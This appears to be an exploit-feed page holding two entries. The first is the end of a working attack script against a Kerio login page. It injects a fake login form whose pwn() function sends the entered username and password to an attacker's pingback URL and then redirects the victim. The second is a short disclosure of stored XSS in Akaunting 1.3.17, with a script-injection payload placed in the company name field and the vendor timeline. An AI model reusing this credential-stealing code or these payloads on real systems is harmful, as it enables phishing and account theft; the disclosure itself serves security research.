O5TToMABCAwKAL7/f5puVxu0qE+667qUZ/UlaWoz2N/Ks9SPivL8oUKMZGgQQACgyOQKsbXoihu08E+6i4pZjGqQvTns6LGuWpEiIkEDQIQGCSB2m/xt5LGgxKgmicsRc+fV7lCAAIQGB6B6Ds7MFeFGqh50jeeZ7lCAAIQGCYBu87u0ynHrgg96ej5YaLgVBCAAATOfyq08xxzpRh/jnae/4kRahCAAAQGTECes/Oa+A195HWyhX09mgAAAABJRU5ErkJggg==");background-repeat:no-repeat;background-position:center;}#loginbox{width:325px;height:136px;margin:auto;padding-top:18px;background-image:url(" data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUUAAAADCAYAAAAEAh2YAAAACXBIWXMAAAsSAAALEgHS3X78AAAAaElEQVRIDe2UwQmAQAwEE0W0EPuvyEIU0bh53HFYQpiF4ZL8bh7rZrb82LSvEXHoJRjAAAZKGnD3XR+7xCnuxqTBB3JPZkEwgAEMVDaQPdc6r/dgHmLg1Zw8gmAAAxiobCB7rnVe78EPyq0VC1V6QUAAAAAASUVORK5CYII=");background-repeat:repeat-y;background-position:center;}#loginbox_bottom{width:325px;height:15px;margin:auto;background-image:url(" data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUUAAAAPCAYAAABzwN3jAAAACXBIWXMAAAsSAAALEgHS3X78AAAB8klEQVR4Ae2aTW6DMBBGob8H6XGSQ3XXY3TZXW7UEwSkdtk2gc7n8KFJRPbEepaGGYwd4afoySS0TdM8RjxM+Snys2Icx8/INAhAAAJVEmjb9iUW9jPFb+S/iMNdHNqFUD8NAhCAQM0EFv1n+Y2x8hxDzSRYGwQgAIEgIM9l76luJMVSpIsaiBQDAg0CEKiagF1nMWqx4+VO0YOQYtXfBRYHAQgEgey7WYzeKbrDg47DMHyBDQIQgECNBCa/HWNtdp4deLZT9EUNPPR9v6sRBmuCAAQg0HXdR1A4RFyKcf5N0ZaUGIsUN5vN636/fw+jfoMQAhCAQA0E5DN5bbvdvsV6shTtwFGv4+gR2nEftUPvLjrU5zHKfo0nShoEIACBVRKw6PwUPG/64m4lREtRG8F5xyjpqeXJp57TUf36oGtClBxpEIAABNZGQO5Sy26zHC1BZ/V7XNkJerIu5KZ+9WmipegdIjLMpKghAIG1ErDs7DOLcSmXsd4pakGe5Nrn+XHZUtQYxCgKNAhAYK0E5DC1IruUJUT7LWeNPftt0JKz+Jay55TJ03zXZAhAAAJrIWAh6n5cK1+LeVwWoTrVcl+u87UykAMEIACBGyGQxahbthxdexnl32efKFuC7svnufZ1MgQgAIFbIWAx6n5zfXb+D2WBvaKHL1MMAAAAAElFTkSuQmCC");background-repeat:no-repeat;background-position:center;}input[type="text"], input[type="password"], input[type="email"], #button{color:#888888;margin:auto;box-sizing: border-box;-moz-box-sizing: border-box;-webkit-appearance: none;outline: 0 none;border: 1px solid #CCCCCC;transition: border 0.2s ease 0s;border-radius: 3px;font-size: 13px;height: 32px;margin-bottom: 4px;padding: 0 6px;width: 260px;}input[type="text"]:focus, input[type="password"]:focus, input[type="email"]:focus{color:#888888;outline: 0 none;border: 1px solid #999999;}input[type="email"]{margin-top:1px;}#button{color:#ffffff;margin-left:31px;margin-top:1px;cursor: pointer;transition: border-bottom-color 1s;border: 1px solid;border-radius: 3px;background: -webkit-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: -moz-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: -ms-linear-gradient(top, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background: linear-gradient(to bottom, rgba(255, 0, 0, 0.1) 0, rgba(0, 0, 0, 0.1) 100%);background-color:#e54634;border-color:#212121;}#button:hover, #button:focus{background-color:#ff412b;}/**background-image: -webkit-linear-gradient(top, #e54a39, #d13524);background-image: -moz-linear-gradient(top, #e54a39, #d13524);background-image: -ms-linear-gradient(top, #e54a39, #d13524);background-image: -o-linear-gradient(top, #e54a39, #d13524);background-image: linear-gradient(to bottom, #e54a39, **/</style></head><body><div id="spacer"></div><div id="wrapper"><div id="logo"></div><div id="loginbox_top"></div><div id="loginbox"> <table align="center"> <tbody><tr> <td id="usern"><input class="textbox" id="username" type="email" name="username" maxlength="1024" placeholder="Username"></td></tr><tr> <td id="passwd"><input class="textbox" id="password" type="password" name="password" maxlength="1024" placeholder="Password"></td></tr></tbody></table><input id="button" type="submit" value="Login" onclick="pwn()"></div><div id="loginbox_bottom"></div></div></body>';document.getElementById('ximporter').innerHTML=z;function exitter(){document.location.href='/login/?reason=failure&NTLM=0';}function pwn(){var user=document.getElementById('username').value; var pass=document.getElementById('password').value; var http=new XMLHttpRequest(); http.onreadystatechange=function(){if (this.readyState==4 && this.status==200){console.log('exploit done, credentials have been sent to attacker.');}}; http.open("GET", pingbackURL+"/kerio_exploit/user="+user+"&pass="+pass, true); http.send(); window.setTimeout(exitter,750);}
↧
Akaunting 1.3.17 Cross Site Scripting
Akaunting versions 1.0.0 through 1.3.17 suffer from a cross site scripting vulnerability.
791a391fc2654ecbb529f831ea0d5c43Title: Stored XSS In akaunting compnay name alt
Affected Version: 1.0.0 - 1.3.17
Tested on: Chrome, Firefox, Opera ( Latest version )
Author: Rudra Sarkar (@rudr4_sarkar)
1. Affected "alt" attribute
2. Create account, Confirm Email Verification
3. Create Company name with "><script>alert(document.domain);</script>
4. It will redirect you to dashboard, and you will got popup
5. You will got popup ;)
Timeline:
28-09-2019: Reported to their vendor
28-09-2019: Closed as "out of topic" on github (
https://github.com/akaunting/akaunting/issues/881 ) Fix not deployed.
Thanks,
--
Thanks,
*Rudra Sarkar* | SRT | Security Researcher
@rudr4_sarkar <https://twitter.com/rudr4_sarkar>
↧